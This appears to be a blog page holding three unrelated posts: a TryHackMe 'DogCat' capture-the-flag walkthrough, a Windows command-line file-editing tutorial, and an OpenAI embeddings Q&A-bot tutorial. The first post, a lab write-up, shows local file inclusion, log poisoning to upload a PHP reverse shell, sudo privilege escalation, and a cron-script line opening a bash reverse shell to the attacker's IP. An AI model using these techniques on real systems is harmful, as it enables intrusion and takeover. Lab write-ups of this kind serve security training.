Posted on Leave a comment

TryHackMe DogCat Walkthrough [+ Easy Video]

5/5 – (1 vote)

CHALLENGE OVERVIEW

YouTube Video
  • Link: THM Dogcat
  • Difficulty: Medium
  • Target: Flags 1-4
  • Highlight: intercepting and modifying a web request using burpsuite 
  • Tools used: base64, burpsuite
  • Tags: docker, directory traversal

BACKGROUND

In this tutorial, we will walk a simple website showing pictures of dogs and cats.

We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.

At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.

ENUMERATION/RECON

export target=10.10.148.135
Export myIP=10.6.2.23

Let’s walk the site.

It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.

Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.

We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string. 

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

Raw output:

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== 

Let’s save this string as a file named “string”. Then we can use the command “cat string | base64 -d” to decrypt this string and view it as raw HTML code.

Reading over this HTML code, we can see that the file extension can be set!

If the user doesn’t specify the extension, the default will be .php. This means that we can add “&ext=” to the end of our web address to avoid the .php extension from being added.

In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.

Let’s dive in with burpsuite and start intercepting and modifying requests.

Here is our order of steps for us to get our initial foothold on the target machine:

  1. Create a PHP reverse shell
  2. Start up our netcat listener
  3. Use burp to intercept and modify the web request. Wait until later to click “forward”.
  4. Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
  5. Click “forward” on burp to send the web request.
  6. Activate the shell by entering: $targetIP/bshell.php in the browser address
  7. Catch the revshell on netcat!

STEP 1

Let’s create a PHP pentest monkey revshell.

STEP 2

Let’s first start up a netcat listener on port 2222.

nc -lnvp 2222

STEP 3

Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the shell.php code and rename it bshell.php on the target machine.

This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.

STEP 4

We’ll spin up a simple python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in burpsuite.

STEP 5

Click forward on burp and check to see if code 200 came through for shell.php on the HTTP server.

STEP 6

We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7

We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG

Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=

Now we can decode this string (saved as firstflag.txt) with base64:

base64 --decode firstflag.txt <?php
$flag_1 = "THM{Th—------------ommitted—-------fa}"
?>

LOCAL RECON

LOCATE THE SECOND FLAG

We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt

Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.

find / -type f -name '*flag*' 2>/dev/null

We found the second flag in plaintext!

cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}

CHECK SUDO PERMISSIONS

Let’s check out our sudo permissions with the command:

sudo -l
Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env

EXPLOIT/PRIVILEGE ESCALATION

Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:

$ sudo env /bin/bash

Now we can verify that we are root with the command whoami.

GRAB THE THIRD FLAG 

cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

Let’s start up a new listener to catch the new bash shell outside of the container.

nc -lnvp 3333

We notice that there is a backup.sh that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.

echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}

FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.

Once we secured a revshell, the rest of the box went pretty quickly.

The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.

The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend. 

Posted on Leave a comment

5 Easy Ways to Edit a Text File From Command Line (Windows)

5/5 – (1 vote)

Problem Formulation

Given is a text file, say my_file.txt. How to modify its content in your Windows command line working directory?

I’ll start with the most direct method to solve this problem in 90% of cases and give a more “pure” in-terminal method afterward.

Method 1: Using Notepad

The easiest way to edit a text file in the command line (CMD) on your Windows machine is to run the command notepad.exe my_text_file.txt, or simply notepad my_text_file.txt, in your cmd to open the text file with the visual editor Notepad.

notepad.exe my_file.txt

You can also skip the .exe prefix in most cases:

notepad my_text_file.txt

Now, you may ask:

💡 Is Notepad preinstalled in any Windows installation? The answer is: yes! Notepad is a generic text editor to create, open, and read plaintext files and it’s included with all Windows versions.

Here’s how that looks on my Win 10 machine:

When I type in the command notepad.exe my_text_file.txt, CMD starts the Notepad visual editor in a new window.

I can then edit the file and hit CTRL + S to save the new contents.

But what if you cannot open a text editor—e.g. if you’re logged into a remote server via SSH?

Method 2: Pure CMD Approach

If you cannot open Notepad or other visual editors for some reason, a simple way to overwrite a text file with built-in Windows command line tools is the following:

  • Run the command echo 'your new content' > my_file.txt to print the new content using echo and pipe the output into the text file my_text_file.txt using >.
  • Check the new content using the command type my_text_file.txt.
C:\Users\xcent\Desktop>echo 'hello world' > my_file.txt
C:\Users\xcent\Desktop>type my_file.txt 'hello world'

Here’s what this looks like on my Windows machine, where I changed my_file.txt to contain the text 'hello world!':

This is a simple and straightforward approach to small changes. However, if you have a large file and you just want to edit some minor details, this is not the best way.

Method 3: Change File Purely In CMD (Copy Con)

If you need a full-fledged solution to edit potentially large files in your Windows CMD, use this method! 👇

To create a new file in Windows command prompt, enter copy con followed by the target file name (copy con my_file.txt). Then enter the text you want to put in the file. To end and save the file, press Ctrl+Z then Enter or F6 then Enter.

copy con my_file.txt

How this looks on my Win machine:

A couple of notes:

💡 Info: To edit an existing file, display the text by using the type command followed by the file name. Then copy and paste the text into the copy con command to make changes. Be careful not to make any typos, or you’ll have to start over again. Backspace works if you catch the mistake before pressing Enter. Note that this method may not work in PowerShell or other command line interfaces that don’t support this feature.

Method 4: If you SSH’d to a Unix Machine

Of course, if you have logged in a Unix-based machine, you don’t need to install any editor because it comes with powerful integrated editors such as vim or emacs.

One of the following three commands should open your file in a terminal-based editing mode:

vim my_text_file.txt
vi my_text_file.txt
emacs my_text_file.txt

You can learn more about Vim here.

Summary

To edit a file.txt in the command line, use the command notepad file.txt to open a graphical editor on Windows.

If you need a simple file edit in your terminal without a graphical editor and without installation, you can use the command echo 'new content' > file.txt that overwrites the old content in file.txt with new content.

If you need a more direct in-CMD text editor run copy con file.txt to open the file in editing mode.

If you’re SSH’d into a Unix machine, running the Vim console-based editor may be the best idea. Use vim file.txt or vi file.txt to open it.

Feel free to join our email coding academy (it’s free):

👉 Recommended: How to Edit a Text File in PowerShell (Windows)

Posted on Leave a comment

Building a Q&A Bot with OpenAI: A Step-by-Step Guide to Scraping Websites and Answer Questions

5/5 – (2 votes)

Have you ever found yourself deep in the internet rabbit hole, searching for an answer to a question that just won’t quit?

It can be frustrating to sift through all the online information and still come up empty-handed. But what if there was a way to get accurate and reliable answers in a snap? Enter the Q&A bot – your new best friend for all your pressing questions!

✅ In this blog, we will take you on a wild ride to show you how to build your very own Q&A bot using OpenAI’s language models. We’ll guide you through the process of scraping text from a website, processing it, and using OpenAI’s language models to find the answers you seek.

And let’s face it, who doesn’t love having a robot friend that can answer all their burning questions? So buckle up and let’s build a quirky, lovable Q&A bot together!

You can check out the whole code project on the GitHub (cookbook). I’ll explain the steps in the following

Overview

This tutorial presents a Python script that

  • crawls a website,
  • extracts the text from the webpages,
  • tokenizes the text, and
  • creates embeddings for each text (quick explanation on “embeddings” below).

It then uses OpenAI’s API to answer questions based on the embeddings of the text.

You will need to create your own API key in case you want to try it yourself.

👉 Recommended: OpenAI API – or How I Made My Python Code Intelligent

You should also install the openai library — I’ve written a blog tutorial on this too:

👉 Recommended: How to Install OpenAI in Python?

Scroll down to the whole code section if you want to try it by copy&paste.

Step 1

This section of the code imports the necessary Python libraries for the script, including requests for sending HTTP requests, re for regular expressions, urllib.request for opening URLs, BeautifulSoup for parsing HTML and XML, deque for creating a queue, HTMLParser for parsing HTML, urlparse for parsing URLs, os for interacting with the operating system, pandas for working with dataframes, tiktoken for getting a tokenizer, and openai for creating embeddings and answering questions.

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"])

Step 2

This section of the code defines a function called get_hyperlinks that takes a URL as input, tries to open the URL and read the HTML, and then parses the HTML to get hyperlinks. If the response is not HTML, it returns an empty list.

################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks

Step 3

This section of the code defines a function called get_domain_hyperlinks that takes a domain and a URL as input and returns a list of hyperlinks from the URL that are within the same domain. If the hyperlink is a URL, it checks if it is within the same domain. If the hyperlink is not a URL, it checks if it is a relative link.

################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links))

Step 4

This section of the code defines a function called crawl that takes a URL as input, parses the URL to get the domain, creates a queue to store the URLs to crawl, creates a set to store the URLs that have already been seen (no duplicates), and creates a directory to store the text files. It then continues crawling until the queue is empty, saving the text from each URL to a text file, and getting the hyperlinks from each URL and adding them to the queue.

################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url)

Step 5

This section of the code defines a function called remove_newlines that takes a pandas Series object as input, replaces newlines with spaces, and returns the modified Series.

################################################################################
### Step 5
################################################################################ def remove_newlines(serie): serie = serie.str.replace('\n', ' ') serie = serie.str.replace('\\n', ' ') serie = serie.str.replace(' ', ' ') serie = serie.str.replace(' ', ' ') return serie

Step 6

This section of the code creates a list called texts to store the text files, gets all the text files in the text directory, opens each file, reads the text, omits the first 11 lines and the last 4 lines, replaces -, _, and #update with spaces, and appends the modified text to the list of texts. It then creates a dataframe from the list of texts, sets the text column to be the raw text with the newlines removed, and saves the dataframe as a CSV file.

################################################################################
### Step 6
################################################################################ # Create a list to store the text files
texts=[] # Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"): # Open the file and read the text with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f: text = f.read() # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces. texts.append((file[11:-4].replace('-',' ').replace('_', ' ').replace('#update',''), text)) # Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns = ['fname', 'text']) # Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

Step 7

This section of the code loads a tokenizer and applies it to the text column of the dataframe to get the number of tokens for each row. It then creates a histogram of the number of tokens per row.

################################################################################
### Step 7
################################################################################ # Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base") df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text'] # Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x))) # Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

Step 8

This section of the code defines a maximum number of tokens, creates a function called split_into_many that takes text and a maximum number of tokens as input and splits the text into chunks of a maximum number of tokens.

It then loops through the dataframe and either adds the text to the list of shortened texts or splits the text into chunks of a maximum number of tokens and adds the chunks to the list of shortened texts.

################################################################################
### Step 8
################################################################################ max_tokens = 500 # Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens = max_tokens): # Split the text into sentences sentences = text.split('. ') # Get the number of tokens for each sentence n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences] chunks = [] tokens_so_far = 0 chunk = [] # Loop through the sentences and tokens joined together in a tuple for sentence, token in zip(sentences, n_tokens): # If the number of tokens so far plus the number of tokens in the current sentence is greater # than the max number of tokens, then add the chunk to the list of chunks and reset # the chunk and tokens so far if tokens_so_far + token > max_tokens: chunks.append(". ".join(chunk) + ".") chunk = [] tokens_so_far = 0 # If the number of tokens in the current sentence is greater than the max number of # tokens, go to the next sentence if token > max_tokens: continue # Otherwise, add the sentence to the chunk and add the number of tokens to the total chunk.append(sentence) tokens_so_far += token + 1 return chunks shortened = [] # Loop through the dataframe
for row in df.iterrows(): # If the text is None, go to the next row if row[1]['text'] is None: continue # If the number of tokens is greater than the max number of tokens, split the text into chunks if row[1]['n_tokens'] > max_tokens: shortened += split_into_many(row[1]['text']) # Otherwise, add the text to the list of shortened texts else: shortened.append( row[1]['text'] )

Step 9

This section of the code creates a new dataframe from the list of shortened texts, applies the tokenizer to the text column of the dataframe to get the number of tokens for each row, and creates a histogram of the number of tokens per row.

################################################################################
### Step 9
################################################################################ df = pd.DataFrame(shortened, columns = ['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

Step 10

Step 10 involves using OpenAI’s language model to embed the text into vectors. This allows the model to analyze the text and make predictions based on its content. The openai.Embedding.create() function is used to create the embeddings, and they are saved in a new column in the DataFrame.

################################################################################
### Step 10
################################################################################ # Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

Step 11

Step 11 involves loading the embeddings from the DataFrame and converting them to numpy arrays.

################################################################################
### Step 11
################################################################################ df=pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array) df.head()

Step 12

Step 12 includes the create_context() and answer_question() functions that use the embeddings to find the most similar context to a question and then answer it based on that context. These functions leverage OpenAI’s language models and the embeddings created in Step 10 to provide accurate and reliable answers. The create_context() function creates the context based on the question and the embeddings, while the answer_question() function uses the context and question to generate a response using OpenAI’s GPT-3 language model.

################################################################################
### Step 12
################################################################################ def create_context( question, df, max_len=1800, size="ada"
): """ Create a context for a question by finding the most similar context from the dataframe """ # Get the embeddings for the question q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding'] # Get the distances from the embeddings df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine') returns = [] cur_len = 0 # Sort by distance and add the text to the context until the context is too long for i, row in df.sort_values('distances', ascending=True).iterrows(): # Add the length of the text to the current length cur_len += row['n_tokens'] + 4 # If the context is too long, break if cur_len > max_len: break # Else add it to the text that is being returned returns.append(row["text"]) # Return the context return "\n\n###\n\n".join(returns) def answer_question( df, model="text-davinci-003", question="Am I allowed to publish model outputs to Twitter, without a human review?", max_len=1800, size="ada", debug=False, max_tokens=150, stop_sequence=None
): """ Answer a question based on the most similar context from the dataframe texts """ context = create_context( question, df, max_len=max_len, size=size, ) # If debug, print the raw model response if debug: print("Context:\n" + context) print("\n\n") try: # Create a completions using the questin and context response = openai.Completion.create( prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:", temperature=0, max_tokens=max_tokens, top_p=1, frequency_penalty=0, presence_penalty=0, stop=stop_sequence, model=model, ) return response["choices"][0]["text"].strip() except Exception as e: print(e) return ""

Step 13

Step 13 provides an example of using the answer_question() function to answer two different questions. The first question is a simple one, while the second question requires more specific knowledge. This example demonstrates the versatility of the Q&A bot and its ability to answer a wide range of questions.

################################################################################
### Step 13
################################################################################ print(answer_question(df, question="What day is it?", debug=False)) print(answer_question(df, question="What is our newest embeddings model?"))

Putting It All Together

You can check out the whole code project on the GitHub or simply copy and paste it from here:

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"]) ################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks ################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links)) ################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url) ################################################################################
### Step 5
################################################################################ def remove_newlines(serie): serie = serie.str.replace('\n', ' ') serie = serie.str.replace('\\n', ' ') serie = serie.str.replace(' ', ' ') serie = serie.str.replace(' ', ' ') return serie ################################################################################
### Step 6
################################################################################ # Create a list to store the text files
texts=[] # Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"): # Open the file and read the text with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f: text = f.read() # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces. texts.append((file[11:-4].replace('-',' ').replace('_', ' ').replace('#update',''), text)) # Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns = ['fname', 'text']) # Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head() ################################################################################
### Step 7
################################################################################ # Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base") df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text'] # Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x))) # Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist() ################################################################################
### Step 8
################################################################################ max_tokens = 500 # Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens = max_tokens): # Split the text into sentences sentences = text.split('. ') # Get the number of tokens for each sentence n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences] chunks = [] tokens_so_far = 0 chunk = [] # Loop through the sentences and tokens joined together in a tuple for sentence, token in zip(sentences, n_tokens): # If the number of tokens so far plus the number of tokens in the current sentence is greater # than the max number of tokens, then add the chunk to the list of chunks and reset # the chunk and tokens so far if tokens_so_far + token > max_tokens: chunks.append(". ".join(chunk) + ".") chunk = [] tokens_so_far = 0 # If the number of tokens in the current sentence is greater than the max number of # tokens, go to the next sentence if token > max_tokens: continue # Otherwise, add the sentence to the chunk and add the number of tokens to the total chunk.append(sentence) tokens_so_far += token + 1 return chunks shortened = [] # Loop through the dataframe
for row in df.iterrows(): # If the text is None, go to the next row if row[1]['text'] is None: continue # If the number of tokens is greater than the max number of tokens, split the text into chunks if row[1]['n_tokens'] > max_tokens: shortened += split_into_many(row[1]['text']) # Otherwise, add the text to the list of shortened texts else: shortened.append( row[1]['text'] ) ################################################################################
### Step 9
################################################################################ df = pd.DataFrame(shortened, columns = ['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist() ################################################################################
### Step 10
################################################################################ # Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head() ################################################################################
### Step 11
################################################################################ df=pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array) df.head() ################################################################################
### Step 12
################################################################################ def create_context( question, df, max_len=1800, size="ada"
): """ Create a context for a question by finding the most similar context from the dataframe """ # Get the embeddings for the question q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding'] # Get the distances from the embeddings df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine') returns = [] cur_len = 0 # Sort by distance and add the text to the context until the context is too long for i, row in df.sort_values('distances', ascending=True).iterrows(): # Add the length of the text to the current length cur_len += row['n_tokens'] + 4 # If the context is too long, break if cur_len > max_len: break # Else add it to the text that is being returned returns.append(row["text"]) # Return the context return "\n\n###\n\n".join(returns) def answer_question( df, model="text-davinci-003", question="Am I allowed to publish model outputs to Twitter, without a human review?", max_len=1800, size="ada", debug=False, max_tokens=150, stop_sequence=None
): """ Answer a question based on the most similar context from the dataframe texts """ context = create_context( question, df, max_len=max_len, size=size, ) # If debug, print the raw model response if debug: print("Context:\n" + context) print("\n\n") try: # Create a completions using the questin and context response = openai.Completion.create( prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:", temperature=0, max_tokens=max_tokens, top_p=1, frequency_penalty=0, presence_penalty=0, stop=stop_sequence, model=model, ) return response["choices"][0]["text"].strip() except Exception as e: print(e) return "" ################################################################################
### Step 13
################################################################################ print(answer_question(df, question="What day is it?", debug=False)) print(answer_question(df, question="What is our newest embeddings model?"))

How to Run This Code?

This program is a Python script that scrapes text from a website, processes it, and then uses OpenAI’s language models to answer questions based on the scraped text.

All of the following explanations concern the original code project on the GitHub here.

Here’s a step-by-step guide on how to use it:

  1. Install the required packages: The script uses several Python packages, including requests, BeautifulSoup, pandas, and openai. You can install these packages by running pip install -r requirements.txt in the directory where the script is located.
  2. Set the website to scrape: In the script, you can specify the website to scrape by setting the domain and full_url variables in Step 1. The domain variable should be the root domain of the website (e.g., “example.com”), and the full_url variable should be the full URL of the website (e.g., “https://www.example.com/“).
  3. Run the script: You can run the script in a Python environment by executing python script.py in the directory where the script is located.
